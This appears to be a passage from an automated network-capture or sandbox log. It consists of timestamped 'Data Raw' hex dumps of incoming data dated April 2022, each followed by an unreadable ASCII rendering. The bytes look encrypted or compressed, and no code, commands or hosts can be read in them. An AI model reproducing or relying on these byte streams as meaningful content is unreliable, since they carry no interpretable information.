                                                  2022-04-23 06:15:18 UTC1670INData Raw: 5f 10 f6 df cc 40 40 43 69 8e 72 06 40 13 7d 22 4d 01 39 d3 21 f9 13 08 9d f3 64 b9 f0 c2 f8 c4 53 f9 69 ab 7f f4 de 5d d4 8f 05 5f f1 ca f4 c2 f4 f9 37 f5 bc ba ec fd 8c 94 a9 ec fe d6 41 11 73 b9 9a ab 72 fc 74 0a 5a 0b e4 47 da a3 ca 11 e2 dc 3f b1 25 0a b4 68 11 c9 c4 49 ab 50 8b aa 25 9f da a8 56 4e d0 16 09 dd 9b ee 9f cf d3 8e 7c aa 6f f9 7b 16 0d 02 2b c5 36 8c 3c de 5a d6 1a 11 45 bc 9d eb f9 1e cd e2 73 d7 9d c4 a5 c1 eb 4c fe 44 f3 06 6a 06 a0 13 1a 46 66 15 28 2d 9b 78 72 91 02 b6 43 93 7e 95 cd cb 8f 71 59 3c 22 25 e4 b2 24 1e 37 5f b2 2d 2c 1e 33 e8 28 cc cf 34 8b a8 9f f6 5d fa de 21 1d 1f 3d a2 5a 11 04 6c 2f f9 17 69 1a e7 e2 95 3d dc 1a fe 6b 15 5c 61 77 c1 51 f7 63 05 bf 68 2a 55 9e 68 ea 83 a1 9f 08 a4 19 02 dc cf df 3d a1 77 b0 62 4f
                                                  Data Ascii: _@@Cir@}"M9!dSi]_7AsrtZG?%hIP%VN|o{+6<ZEsLDjFf(-xrC~qY<"%$7_-,3(4]!=Zl/i=k\awQch*Uh=wbO
                                                  2022-04-23 06:15:18 UTC1674INData Raw: 3a 47 86 8d 2c 0e d3 26 ad 2a b7 43 51 09 1e 94 11 0c df f4 8e 04 a1 60 90 99 fa 00 72 a0 2e 57 58 ff 4f 40 66 5f 5c 68 43 1b b9 83 d3 2b 30 7f f2 33 6a ea 65 64 74 94 95 d1 8e 64 ac 1d 06 5c 3e 71 0f 44 ea 6d 44 0e 22 68 2c 30 b5 25 18 af 2f 85 0c e2 d3 82 d6 51 6b fb 93 e6 63 70 71 b5 31 70 9b 7d 4f 0c ce d1 e9 48 74 f8 a0 e3 19 ed fc f6 0e 33 5e a8 ce 17 ba 44 61 f9 00 9e 91 34 d6 5a 13 9a 18 50 1e 85 96 a3 52 b0 04 d4 f9 88 3c 83 93 07 e1 3b ee 7d b6 07 4d 8b b5 93 3a 81 d7 5a 93 7d a4 98 59 a8 13 05 ce fc df 00 ed e9 83 e7 18 25 09 96 e8 02 aa bc bc 06 ad b0 19 a8 d5 48 a8 9a 82 8f 40 28 2c c1 5a 1c e5 72 d3 67 64 f0 46 10 03 07 72 58 5c c0 a5 70 20 c5 36 57 31 94 6c 6d f6 eb 20 1e a7 e3 d0 a4 59 97 2c 2c 7b 5c 8b b5 fa f7 c6 0d ef 17 eb c3 68 66 d9
                                                  Data Ascii: :G,&*CQ`r.WXO@f_\hC+03jedtd\>qDmD"h,0%/Qkcpq1p}OHt3^Da4ZPR<;}M:Z}Y%H@(,ZrgdFrX\p 6W1lm Y,,{\hf
                                                  2022-04-23 06:15:18 UTC1677INData Raw: 57 ad a4 32 00 26 09 26 52 82 0b 68 7c 64 fd 7d 32 ed 90 6d b6 64 e3 6a c5 54 93 8d ce fd 57 60 d6 3f d2 a1 43 bf 0b 71 60 e1 0b 03 2a 67 48 6c bd 73 99 4b 35 28 26 c7 42 b4 0a 5b d3 f9 2a 4a 4b a7 77 3c 34 b5 39 a8 90 1a 20 d4 68 48 52 a3 e7 69 89 5f aa ed e0 e2 e6 a0 55 b9 8c 09 6b 39 f6 29 2c ce 11 de d2 3f bf fa 4d 36 40 4f 87 6a 10 4a 84 0f e1 85 6c 6a 13 43 f3 28 df 30 81 b7 5f da 60 4c 86 37 22 77 cb 24 90 d1 36 7c 3b c4 37 19 34 9d c2 89 b6 b1 cc b1 f8 a7 c7 ea 30 ad 0e f0 05 91 6a d2 60 dd 9d f0 e6 10 02 f2 f9 bc 71 b1 84 4d d0 88 03 10 49 5a c5 b1 47 95 74 d2 6a ec c1 1d 4f df 0d e6 74 c8 e4 98 cc 3b da 83 45 69 19 7b 60 bf 40 bc da e0 9b 31 6f 4e 47 cf 85 84 73 76 93 99 0f 5b a8 37 70 04 80 80 a5 83 4c 38 66 f2 50 24 9b eb 2c aa e0 90 e7 aa 05
                                                  Data Ascii: W2&&Rh|d}2mdjTW`?Cq`*gHlsK5(&B[*JKw<49 hHRi_Uk9),?M6@OjJljC(0_`L7"w$6|;740j`qMIZGtjOt;Ei{`@1oNGsv[7pL8fP$,
                                                  2022-04-23 06:15:18 UTC1681INData Raw: 0b e9 b5 e8 a7 4d 7a 12 07 62 2c 0f 37 d2 89 4b 24 89 27 6f 55 42 18 c6 36 cc 1d c3 1f 59 b8 3b 5e 67 a4 f3 32 4e 99 b3 61 37 7f b7 b8 d9 48 79 91 05 6f bf dd 6b 37 ea 9d 22 84 03 00 b4 8d 88 01 dd 93 54 ec ce e5 88 6d 4e 7b d2 f2 c4 89 25 b3 5d c3 12 fa 38 d1 b2 30 2c ea 04 3b c6 e4 ba 3b 90 97 eb 52 a9 27 19 82 d0 95 1a e3 0c 93 85 38 e2 ac e7 3c 50 c7 81 4a 44 41 ef 78 e3 0a ee d3 c3 48 aa 47 83 a9 ff a7 2b 27 9c be a4 3e ee 23 30 02 40 b5 a5 73 7c 38 34 6f b3 b7 1f 5e dd e8 a3 0b 8e f0 3a 3b c6 13 b1 18 b1 b2 4a ce e6 18 38 de 8d 55 d8 0d 96 ca 6d 8b 0e 78 ad e4 1c a1 9b 7a 8c 9c ce c1 ee 7b a3 f2 c6 b7 eb 5e 81 f4 74 93 88 7a 8a 9f 82 b7 f6 db 8f 34 9c ce 4c aa d8 ec d7 96 dc a1 d3 53 a8 8b e2 be c7 23 08 30 5d 97 8b 82 78 85 f9 87 31 18 55 21 80 53
                                                  Data Ascii: Mzb,7K$'oUB6Y;^g2Na7Hyok7"TmN{%]80,;;R'8<PJDAxHG+'>#0@s|84o^:;J8Umxz{^tz4LS#0]x1U!S
                                                  2022-04-23 06:15:18 UTC1686INData Raw: b7 43 aa 10 da b7 3f d8 0d 68 3d 61 8f 9a 85 3c f9 0d 96 e0 cc e7 d1 6b ab 22 73 41 70 4f 77 74 73 bf 61 18 37 5a 25 b4 eb e6 21 cb a1 a5 d4 82 6b 17 45 bb 24 52 9f 3a 8a 27 61 70 ea c4 ad 3c f9 84 e3 ee ff 80 ec 53 c1 ca 7f 0a 5d 7f c7 30 35 24 d8 55 95 ee 33 a3 94 4e 03 49 87 25 0d 84 37 3d 87 4e cc 41 7d 01 1a b7 b7 4e 45 ed 0c 5c 04 75 eb ee 66 69 96 1a 53 83 66 b0 ae 1b b3 80 c3 52 69 81 d3 fa 49 8a 01 47 c3 d5 0e ba 3f 8a 45 4d 48 40 f6 e9 c3 ab 8e 7a 0f 44 88 e8 ff eb 00 4f 82 7c 01 32 29 68 ab 95 ce 06 f9 66 ce 0e 5f 5e 5a 29 37 6b d1 52 37 4b da 57 36 ae 8b 80 0b db e1 c5 2f 59 48 30 a7 f6 42 cd 27 13 de 84 60 9a 79 a8 ac ab 11 f2 92 11 e2 a7 d5 31 02 6e d6 a9 c9 4f 90 2a 09 ca a9 45 6a 41 66 63 2d ac 6f 22 6f 42 5f c7 60 26 ed 3d f1 18 41 0e cb
                                                  Data Ascii: C?h=a<k"sApOwtsa7Z%!kE$R:'ap<S]05$U3NI%7=NA}NE\ufiSfRiIG?EMH@zDO|2)hf_^Z)7kR7KW6/YH0B'`y1nO*EjAfc-o"oB_`&=A
                                                  2022-04-23 06:15:18 UTC1690INData Raw: 54 4e 16 83 e6 41 5a ab 89 a9 ee 7c 63 22 c5 bc 64 ce 27 e1 1c b6 c9 b1 e7 62 07 3c 6b 26 43 5a 0b 2e 82 12 cf 55 2c db b7 eb 9b 97 4b 45 34 97 71 10 55 c6 17 a8 0e 42 6c 4b b9 c5 b7 f0 7e 21 8b b8 00 b9 cd 8a 66 8c ad c6 da 1b c1 91 37 a5 e6 9e 2e 57 0e da f1 cd b6 dc fd ad bd eb 83 f5 24 e4 17 02 fe 6a 93 88 7e 57 8b 98 4e fb dc 71 02 27 c3 a5 2c 5e 21 59 44 c8 ea 55 f1 88 bc 20 b0 a4 2d e2 97 ea 4c 9d d4 19 bd 56 9a 9d aa 45 44 f6 e7 b8 3f 6a 33 8e 46 36 f0 f5 20 5d d2 fd 6d 7b ea 9a b9 41 0e 03 0a 4f 56 21 27 2e 92 9c 39 b7 ff 1a d6 87 15 25 10 aa e6 cf a9 63 b2 1a 0e 26 2e 75 2c ce 28 dc d5 82 f6 45 b9 6d 0e 54 09 08 89 7c ba 84 89 53 42 ff cc 41 85 ae e2 ba 6c 5b b9 a9 be aa fe 6f 87 fd 8c 86 dc 04 b7 c7 15 a9 0a f9 78 61 e6 93 0e e6 2e 6a cd ca f8
                                                  Data Ascii: TNAZ|c"d'b<k&CZ.U,KE4qUBlK~!f7.W$j~WNq',^!YDU -LVED?j3F6 ]m{AOV!'.9%c&.u,(EmT|SBAl[oxa.j
                                                  2022-04-23 06:15:18 UTC1694INData Raw: f2 7d 4f 36 d4 cc 5b ab 6e b5 90 a1 48 c5 b4 88 49 05 f4 66 70 f6 90 ae d2 3d fd 95 3e ff 8e cc 60 9d 41 8e 59 a9 88 66 c9 dd c8 31 12 af 4e 1c cc 69 1d 03 1a b4 c7 10 5a de e0 8a 05 80 ec 2b c8 23 e4 b5 e4 2b f1 7f 27 fa 54 1e ed 40 36 c3 94 16 04 62 9f 4c 3a 98 0c 2c b5 cf 6c e0 0c 2f ba 98 d3 ea ca 37 1e 52 63 4a e0 17 1d 1e 00 25 93 51 4d 1b 02 9a f7 d8 ab ab 80 04 20 39 b7 45 ac 31 92 6a 60 f0 f6 9c 88 a8 2e aa 83 8a c5 c9 bf 5e 52 3e 15 f9 8f 34 cc b1 5e a0 aa fb af 67 5c cd 35 9c 03 20 cf 9a ec d8 95 af d1 78 b1 20 b2 70 ea fe 0b 9a 02 eb 4f 36 17 d5 06 10 69 85 4f fe e4 f7 dd 7a 6a 0a 88 23 ff 41 cb 36 11 c7 f4 04 22 58 1d 37 82 b1 17 fc cd 76 81 8b f2 17 62 b3 02 d1 14 6a 21 85 05 91 6a 64 20 16 43 27 66 92 18 cd 89 68 29 e7 8a ca c2 a4 86 c3 38
                                                  Data Ascii: }O6[nHIfp=>`AYf1NiZ+#+'T@6bL:,l/7RcJ%QM 9E1j`.^R>4^g\5 x pO6iOzj#A6"X7vbj!jd C'fh)8
                                                  2022-04-23 06:15:18 UTC1698INData Raw: 2f 81 f1 4c af c8 d5 53 54 db 36 eb 33 05 d4 40 db 55 e6 a0 91 0b 12 1e 41 96 b9 93 17 e7 e1 26 09 23 24 77 73 87 a9 e5 a0 31 e2 88 97 7c ba e6 28 8b ea 1d 4a ff 3c 07 15 fe 90 fb 3d 0c 68 5b c8 24 00 00 ff 8a fa 0a ca 3a 40 64 00 eb 35 f6 2f 54 3b b5 ea 35 d6 5e d6 b8 dc 71 3d 43 3d 99 9a 1b 4a 0e fa f1 63 09 b2 f1 c5 ad 36 b8 6a 41 b2 29 92 32 68 53 ed 3c 17 d4 15 49 26 2c a4 d5 30 52 ce de 5b 39 d9 3d 05 64 38 da 16 d9 a9 2a 88 75 76 5a 81 08 b9 18 43 7d 4a 33 5c 49 a0 67 53 30 83 9c bb 94 db 01 8a 74 2a ae a7 50 e1 66 96 d5 75 3e c5 cc a8 d8 95 b6 94 d0 ca 54 fc c3 59 df 3a dc 23 f2 ac 08 5d 38 d4 fb b2 4c e6 ee 58 2f fc a7 4e ba 7b 5a e8 6f ac 9d 66 c3 d4 01 41 c9 26 26 00 19 88 31 a4 80 25 89 fd e7 9c f9 1c c9 b0 33 52 a4 51 d2 33 cd e6 1c a6 b2 bb
                                                  Data Ascii: /LST63@UA&#$ws1|(J<=h[$:@d5/T;5^q=C=Jc6jA)2hS<I&,0R[9=d8*uvZC}J3\IgS0t*Pfu>TY:#]8LX/N{ZofA&&1%3RQ3
                                                  2022-04-23 06:15:18 UTC1702INData Raw: 4c 45 91 27 f0 fd e8 51 51 81 62 4b 94 dd c0 81 3d 16 11 50 41 a0 00 b9 71 db d0 55 0b a2 30 d1 30 31 a3 7b 04 f1 ab 42 92 75 87 88 c5 e2 8e 71 27 01 f1 a1 19 52 70 8b 88 fb a6 45 1c f5 ea 9b 83 22 48 f5 19 8a 45 ee fe fa 50 bc f6 13 68 97 78 ba d6 f6 fd 8c ee eb b8 01 eb bb 29 e5 bd ee 55 38 e1 39 d6 99 30 45 42 37 55 1c 34 05 59 9f 93 7a e5 7b 28 21 ed 82 d5 f2 5f 78 aa d2 99 9f 04 6c 09 54 99 0a ac f4 ac 04 25 57 0b 14 a9 9e 0c c0 8c e2 f5 3e 69 78 13 57 0a 9e 9a b7 ce 65 11 4e b5 a1 12 8a 8e 3b c1 5e 79 b0 b6 97 4e 58 a8 4e 0d ce 18 9c 8a cb 5a 5d 3c 25 79 2c c5 9f 46 75 ba 63 cd 65 f1 be a4 5d 51 25 f6 a4 2d f1 71 63 3f bb 03 e2 98 8e 15 65 18 71 a8 37 31 f7 45 39 92 25 86 71 81 4e b6 61 56 71 91 79 80 c3 45 21 ac 77 d9 71 c5 a7 dc 36 ee ca 16 91 c8
                                                  Data Ascii: LE'QQbK=PAqU001{Buq'RpE"HEPhx)U890EB7U4Yz{(!_xlT%W>ixWeN;^yNXNZ]<%y,Fuce]Q%-qc?eq71E9%qNaVqyE!wq6
                                                  2022-04-23 06:15:18 UTC1706INData Raw: 27 3e 90 23 0b 20 cd 68 96 d8 a6 b7 15 92 c5 bc 9d 54 ad ea 8d ba 27 85 06 57 88 e3 00 23 e3 f8 c7 a5 16 79 b0 dc 87 be 0c a0 d2 9f 9b bb c4 d0 33 7b 60 e9 13 21 47 02 b8 52 36 5a 56 0f ad 06 d2 5c 21 15 98 dc 14 c5 c2 8e e3 7a dc ae 1b 6a 85 74 57 59 f6 0c 05 47 9e c4 bc 2d d8 fb 56 a4 1c 50 22 10 66 50 20 77 e8 63 56 a6 89 04 6e 43 4f 25 71 49 13 e4 d7 7c e4 92 54 e9 88 4d 9e c1 46 bf 54 ea a1 72 0d 8c d4 74 4c 71 9e 47 91 15 ad 8d fc 68 b9 3e 4c 10 8e df 4e 65 69 ec ca 59 e2 1b ea f0 8e dd 14 85 3e db e3 0c 83 02 9a 3a 30 ae 0a 90 41 de 0f 47 3c c9 fa c4 6e 79 72 44 6c b7 9b df c0 fc 36 0c 61 dd 20 b3 f2 6c a9 1a cd 23 86 17 96 0f 06 4f df 57 9e 3e da 0d 35 a3 f2 90 c9 f2 7a d2 ac bf 5b 48 54 8c 94 c0 c4 9d 45 50 1f be 84 c9 e4 d5 79 18 2b 08 9d 07 31
                                                  Data Ascii: '># hT'W#y3{`!GR6ZV\!zjtWYG-VP"fP wcVnCO%qI|TMFTrtLqGh>LNeiY>:0AG<nyrDl6a l#OW>5z[HTEPy+1
                                                  2022-04-23 06:15:18 UTC1709INData Raw: ab fe 25 8d 75 1a ea dd 8e 35 b5 c9 a3 41 71 81 ed f8 79 00 32 73 a7 a5 df c7 17 3c f4 dd f8 37 7e 70 d5 3b 21 05 87 97 4c 60 88 a4 be 49 2f 77 a7 d2 41 44 e3 0d d2 3f 64 ba c2 b9 21 78 70 46 44 71 b3 34 b6 3c fe 34 4c ab ea 1d e8 7b ec b3 6a 36 6a 8c 74 11 cf 1e be fa 7b 50 9f 4b 78 6d f2 c8 25 f8 f7 1e d9 84 28 b7 5f 89 6f b2 56 dc 72 66 42 df 49 cb ff 87 9a 80 39 d3 d1 9f 11 e2 2e 43 fd 70 b4 15 c9 32 dd 39 5d ca a7 bb 75 81 64 c7 88 8a bb ca a6 30 c5 e6 d6 e8 bc 2a 9c ad 8b bd 79 6a b7 3b 08 14 ce fd df 5a ec 72 bb c6 9b 7b 7f 1a d1 ac 74 74 5f bd bc f4 96 16 e5 e9 e4 4f 0b e7 53 74 12 f8 01 d0 17 cd 39 88 77 9b b3 c8 15 38 28 6e b7 eb e7 2a fc b2 f4 f5 5d f8 c3 2c a5 8b eb d1 44 05 17 07 1c b5 99 82 07 bd cb 2f 63 f7 0a d8 45 a4 17 98 a3 a8 fb 60 86
                                                  Data Ascii: %u5Aqy2s<7~p;!L`I/wAD?d!xpFDq4<4L{j6jt{PKxm%(_oVrfBI9.Cp29]ud0*yj;Zr{tt_OSt9w8(n*],D/cE`
                                                  2022-04-23 06:15:18 UTC1713INData Raw: 62 29 65 65 43 85 41 1e b9 2b 9f 8c 3d c9 08 e3 81 92 e9 d4 00 9d a9 f7 c6 b0 03 ea 96 7b 1e 49 5d b7 02 17 69 5a 63 bf 12 db e3 d0 2a ea 98 6e 31 15 aa b9 af 8c 4c 77 39 e0 38 f9 6c 6b 64 43 49 60 f0 7b 45 c7 9b 4a bb ed d4 4f 8c 46 c9 c8 11 eb b0 ae 9b a5 54 0f 9f 6e 52 da bc 58 4c 51 fc 3d 4f 9c 58 88 3e 6f a0 54 62 3e 57 94 3b 55 d9 66 23 55 0b be 8e 52 9f e2 bb 33 ab 4e 43 e0 f3 7c 8c c4 05 4c c0 b7 79 83 01 e4 a7 96 f3 41 bf 22 1b ae 09 53 34 3e 7d bc 34 b0 ec 80 b6 7d 95 81 be d9 39 b7 e8 2b 1b f0 3c 16 a1 df 2e ff 74 92 ed 70 4f aa 01 71 a3 6b 15 49 3d f2 47 42 5d bf 83 02 12 c0 9a 7d 0d 2a 74 64 ea 02 69 df b9 21 1a 42 6d 60 93 a1 e4 2e f0 d2 c8 4a 4e 72 2c ae 78 54 f7 1f 68 7b e8 96 1f 84 3e 36 d6 50 aa be 15 6b 6a 68 91 14 f0 c6 84 b1 ad f4 09
                                                  Data Ascii: b)eeCA+={I]iZc*n1Lw98lkdCI`{EJOFTnRXLQ=OX>oTb>W;Uf#UR3NC|LyA"S4>}4}9+<.tpOqkI=GB]}*tdi!Bm`.JNr,xTh{>6Pkjh
                                                  2022-04-23 06:15:18 UTC1718INData Raw: 12 75 67 5c 5b 95 48 5c 64 8a 62 c8 b9 fc e9 03 c0 e9 95 38 6a 56 ff 5c 06 e3 7a 22 18 8f 59 e8 81 29 cc 49 b2 b7 b5 be df 76 5c 9d b8 c3 f4 c4 a8 a4 d5 34 f6 90 c7 d6 0e 1d 79 b6 98 7c 7c 1a a0 e4 f6 65 28 49 92 85 4f cc 55 93 fc 18 0b 84 70 4d 08 47 68 5e 0c 8a c8 11 ad 5a 3a c3 25 b6 df af 1f 67 ce ff 6b 00 12 6b ac 60 78 7b 5f dc 4a 98 5e 4f 2e 93 2e 91 f6 bf 44 fe a5 64 5e 84 78 ea e9 cc 64 75 79 f0 a6 c0 1b 11 28 86 24 64 d4 4c 70 5e 3f e9 6f ce b6 5a bf a2 bf 3e 21 dc 53 d3 ec 05 2f 29 ea 42 b3 63 c6 02 74 5d db 50 a3 5d 2e 3f 1b cb e2 7e cb 75 38 de 42 74 3b 73 06 6b 7b 18 43 f1 06 32 f6 14 c4 99 78 46 b8 41 60 b4 e3 65 fd e6 1c 31 48 4c 27 79 9b ac 1a f7 1e 55 39 56 43 2e e0 55 15 7a 9a e8 5e 7a e8 f7 8d 22 5f 93 b6 85 84 80 93 a5 ba 5a 5b 65 43
                                                  Data Ascii: ug\[H\db8jV\z"Y)Iv\4y||e(IOUpMGh^Z:%gkk`x{_J^O..Dd^xduy($dLp^?oZ>!S/)Bct]P].?~u8Bt;sk{C2xFA`e1HL'yU9VC.Uz^z"_Z[eC
                                                  2022-04-23 06:15:18 UTC1722INData Raw: 3d ff ce f7 52 6f 90 bd 34 5b dd d4 f2 74 aa 42 60 98 4b e8 86 8f 0a e3 4f 90 8e 5d f8 78 31 5e c5 09 bc 5f 2f b1 e1 3c 2f b6 5a 37 94 3a af 46 d2 9f da f9 e0 bb b4 bf bb 53 29 9e 3c 6c d9 6e 34 e7 ee 2d 4f fe 51 ee 8e f9 ae 83 fc fd 91 dc ce 7d 63 08 d8 bf 70 c6 b2 b2 78 1d 8b d9 09 25 62 20 de 3e 09 22 ff 1b 3e 38 12 d2 ed 64 76 d4 7b bb a9 1c 28 11 a1 8d 15 a6 77 7a 29 ac f3 42 08 86 bf fd f8 f8 c7 29 60 2a f8 dc 3a 09 12 2e dd ec 3f fb 35 5d e1 cb 25 0a e0 24 25 4d 10 30 5f 55 46 2b e2 ef 7f 97 14 91 2a 1c 99 7c c6 af c1 a5 21 6b 01 3e 4a 9f de 57 9c 3d ac f3 c1 f5 d2 b0 c0 e5 92 62 b4 93 c9 33 31 ac 6d e0 81 1c 99 6a 35 5d f6 c3 14 60 3f e1 c7 8d 23 de a5 80 fa 3c d1 5a 65 23 89 67 5f 1f 50 b6 f7 74 13 32 2c a2 e8 99 63 11 6a 77 94 a4 6f 47 9c e6 f4
                                                  Data Ascii: =Ro4[tB`KO]x1^_/</Z7:FS)<ln4-OQ}cpx%b >">8dv{(wz)B)`*:.?5]%$%M0_UF+*|!k>JW=b31mj5]`?#<Ze#g_Pt2,cjwoG
                                                  2022-04-23 06:15:18 UTC1726INData Raw: e7 1d b1 04 24 69 14 0b fa bb c6 8c 54 96 d4 12 a2 dd 1a 81 b5 1b b6 01 d3 dc d7 71 74 cb f4 84 9c 58 81 05 ac c0 48 d0 4f fb 3c 40 fd d0 d4 77 93 6d d5 cf 2e 92 c7 73 d7 7b 6e c7 e4 df bd 89 e3 c0 df 2d e2 68 27 42 a1 f9 ff 1b 29 73 dc 2d 51 f8 4f 01 ef af 0b 1f 89 e1 15 f4 aa 22 c0 7d 4a 42 d2 98 7d 54 55 46 3b 76 a4 e0 46 7a 8d 34 80 71 a8 6b ed ec ef ca 7b 86 7f eb bd ad 4f 79 1d 12 c9 ee 4a 73 43 1f ad 77 6f c6 6e c0 96 4b 1f ae bc c2 f2 44 f5 77 bd 25 21 2f ca f9 b2 d8 27 98 b3 9e 4a f7 0c e1 b4 cb 9a 43 ac 4f 85 fe fb 17 35 a7 76 da ec 3e 49 8b 34 f4 f5 e2 22 b4 43 3c be fc cf 33 0b 79 07 bb 1a bc 47 bb cb 9e 8e 05 06 f9 3e 86 93 ef e9 1b 22 e4 88 60 81 60 83 41 a0 b5 88 ba f0 6c 7d ba e9 93 67 4e be 62 06 1c 82 a1 74 a1 91 38 55 0f 3c 75 10 76 19
                                                  Data Ascii: $iTqtXHO<@wm.s{n-h'B)s-QO"}JB}TUF;vFz4qk{OyJsCwonKDw%!/'JCO5v>I4"C<3yG>"``Al}gNbt8U<uv
                                                  2022-04-23 06:15:18 UTC1730INData Raw: 28 73 ce da ca 35 c6 71 de 1e 29 7a 8a 7d 1d 60 59 11 04 18 ab 6b 53 34 c7 1f e1 68 a1 bb 76 66 b3 a1 f1 fe a1 51 b1 a0 c2 15 0a 15 0f 07 78 04 e7 e4 24 cd e2 ce 5c 3e e5 a8 28 3e c4 cb 10 ac af 0a ad 92 1a 72 fc 35 ad eb 0a d3 9d 53 25 5c e3 f9 f9 5a 50 81 36 32 5e 3d d5 74 9e 9b 23 ae 2d 33 f0 33 ad e2 5b f1 e0 c3 57 dd e7 4c e6 f1 0b 93 e2 15 35 28 10 f1 7b c8 fd e9 7b cf 9c a3 ef c9 3b 40 90 d8 55 7d ef cd 1c 2a 67 67 f6 45 a6 42 e9 99 90 47 a5 40 17 a7 a2 8e 8e 20 66 b1 f5 88 8c 27 c3 5d 51 f4 d0 0e 81 80 64 5c 09 93 92 39 66 a7 06 1d 16 b9 d4 8a ed 27 ba e5 ef 78 78 9a 6a 07 ea 32 a5 91 22 31 b5 aa 73 7c 11 f8 7e b2 c5 62 68 93 3e 56 1a cf 26 e6 57 b1 4d 6f a6 6e dc 81 7f 6b ea b4 97 d7 37 31 5e 90 a5 f7 05 68 9a b2 de 4e 5b 55 e3 bd 30 d7 c4 15 86
                                                  Data Ascii: (s5q)z}`YkS4hvfQx$\>(>r5S%\ZP62^=t#-33[WL5({{;@U}*ggEBG@ f']Qd\9f'xxj2"1s|~bh>V&WMonk71^hN[U0
                                                  2022-04-23 06:15:18 UTC1741INData Raw: 8b 32 e9 05 60 cd 49 25 4b 21 28 44 40 71 5a cb 5f 4a 5a 86 51 9f 73 8d c9 95 65 1a 2d e0 a9 c7 11 ff b5 28 21 a4 92 c6 ea 81 e6 03 00 51 1f 75 13 21 15 75 98 7c 21 76 5d 88 ed 31 9a 1a 15 4a e1 32 16 dc 5b e2 49 d8 f0 c9 7f 40 b4 3c f1 28 08 04 26 9a 3d 8c 84 05 c1 c3 44 46 5a e9 35 61 cd 85 10 e2 52 e9 62 64 42 da 08 cb 1f 1d d3 d4 0e 97 da 9a c8 c3 68 ca ab a8 e6 75 9e 13 3e e1 3e fe 7b a8 d2 96 6f b3 50 10 e8 f4 7a 26 62 31 f6 68 0e ed ff 2e d5 2e 15 68 73 0f 3d 1c d1 ae 07 d8 ba 09 ad cc ab eb 8d ad 74 2d f8 e9 96 94 65 0d 3e 97 bf b8 20 92 4c 35 9c 30 b0 8e 34 9f cf 73 42 99 1c 9f 6d 63 b3 4b d3 45 9f 1f b3 f8 14 36 f0 89 95 c9 df c8 f8 c3 2d ef 91 12 cf 43 0c f5 bf 64 b7 4c 6a 99 d1 64 ea 63 79 41 dc 18 7e ec 74 b6 ed 73 dd b3 29 b1 27 e8 83 fb fe
                                                  Data Ascii: 2`I%K!(D@qZ_JZQse-(!Qu!u|!v]1J2[I@<(&=DFZ5aRbdBhu>>{oPz&b1h..hs=t-e> L504sBmcKE6-CdLjdcyA~ts)'
                                                  2022-04-23 06:15:18 UTC1746INData Raw: b1 9a 91 b4 33 78 b2 15 10 ed aa 02 19 51 0e 99 ae a3 0a 98 2e 18 1b af 44 29 e9 de 53 d2 72 8f 66 b4 a5 3c 1d d5 2c 72 fe 9e 46 e7 98 d4 ee 14 e4 f1 ff 87 12 e9 a0 97 a7 78 d9 e9 47 d7 1b 81 e1 2f d6 c5 40 04 0a 91 68 41 c2 e3 c6 f9 ed e4 26 b6 2f ed b9 94 db b7 01 ee b7 a0 9e 07 1b f9 10 90 a7 48 05 54 b2 a2 4c 60 a6 51 13 f6 55 54 8a 13 30 5a 06 49 86 00 57 0f 19 fe 24 1e 9e bf bf 98 95 fe a0 f4 b0 1d 04 f6 dc 06 e7 13 35 13 dc a7 4f 9a 37 8e 3c a2 99 94 e1 95 9f fc 90 ec 4d b0 ac 42 fe 8c 5f 49 56 39 ef 46 2b 60 49 fe 0e 41 9f 32 17 bc a4 93 4e 41 23 a8 f4 22 0f ac df 5d 52 94 29 ce d5 d1 b7 51 e5 85 80 c8 98 cc 31 b9 87 59 fd 59 5d 9b fc d6 31 04 7a 76 8e 1b bb ca 3b c6 8c 5e a7 d5 66 f0 70 25 9b 1a c0 e2 d7 77 15 55 89 b5 11 25 ab 01 cc 18 17 97 d0
                                                  Data Ascii: 3xQ.D)Srf<,rFxG/@hA&/HTL`QUT0ZIW$5O7<MB_IV9F+`IA2NA#"]R)Q1YY]1zv;^fp%wU%
                                                  2022-04-23 06:15:18 UTC1762INData Raw: 3d 63 16 ad a3 d3 5e 2e c8 39 57 a8 22 0d 03 e4 9a c5 48 a1 25 64 bc a0 8a b0 21 30 48 2b 56 e7 30 cf ba 2f 24 b1 ab e8 41 8d e1 96 7a 5f 8d 91 b7 76 d9 9d c9 1c 5b ff 57 85 72 0e e2 93 9d 5b f6 ad 68 8e 0a da a9 2b 36 a5 9e 7f 68 89 88 10 c4 90 3b 53 6f 71 72 3e 97 41 48 47 cd e4 91 9e c8 ee 52 2d 8f bb 2d a7 e5 2f 77 e4 18 7a a4 30 84 85 aa 22 79 4b 1e 11 2b 46 9d ce f7 15 59 28 97 e7 1d 93 87 db 34 14 b8 96 e0 f2 1d c0 1b d3 90 4d a0 7b e8 06 58 2f 61 c6 b8 07 4f d5 76 24 61 7f 8c 4a d1 b6 53 75 66 b5 2f a4 67 57 11 16 53 6e f4 50 1d 18 1c 62 8c a4 76 b5 ab 7a 8b 5d 42 34 73 2a f1 e9 ba 28 3a 31 de 6c d9 c8 80 25 4b 77 72 08 70 39 fb ab 1e 08 37 f0 28 df 95 db 55 53 c5 0e a4 91 2b 85 30 38 79 2d 18 0a 6b db 87 06 44 db 4c 81 96 47 23 6e 0b 99 cf e3 8d
                                                  Data Ascii: =c^.9W"H%d!0H+V0/$Az_v[Wr[h+6h;Soqr>AHGR--/wz0"yK+FY(4M{X/aOv$aJSuf/gWSnPbvz]B4s*(:1l%Kwrp97(US+08y-kDLG#n
                                                  2022-04-23 06:15:18 UTC1773INData Raw: 9b 09 27 64 3c f7 40 d1 c5 1b 59 b9 56 b0 8c 95 6e a0 24 d3 cb 75 17 18 06 f1 db aa 7a e1 11 a5 1f 45 63 6c 81 51 65 fb f8 1c bb 66 c3 39 73 5a 04 67 cc 19 29 50 d9 42 83 49 2c 3f f1 91 9e 3d 3c 81 6b 51 45 27 2e b3 8d 32 6e 0d b0 ae 93 32 93 d7 c3 ce 35 fb a3 6d 07 ae 1c f9 17 68 10 00 04 14 2c 34 a2 c3 8a 69 4e e6 77 a7 a9 3f fc 53 25 1a f6 23 fd 15 ed fb de 3f 1a 86 c9 f7 fa a7 30 74 2e f0 2b 66 04 64 05 20 89 8d e1 c5 69 6e 2b ea 56 60 a7 59 d3 10 fe 37 36 2e f5 70 74 d0 84 1a 82 68 05 88 32 37 e6 3d 8a fd 21 98 93 31 6c ad 3f 9d 23 5d 31 65 2c 9c 79 cd 5c 4c 1d ea 19 ec 99 8e 2e 6e c8 d3 f5 5c 79 48 ec b5 a0 1d af 64 41 0b 0e 1a bd 54 4d 6b 29 d5 12 94 16 fb 28 9c 2b 67 86 50 03 28 5e aa e9 3a 17 a5 5b 7b eb 51 c5 c2 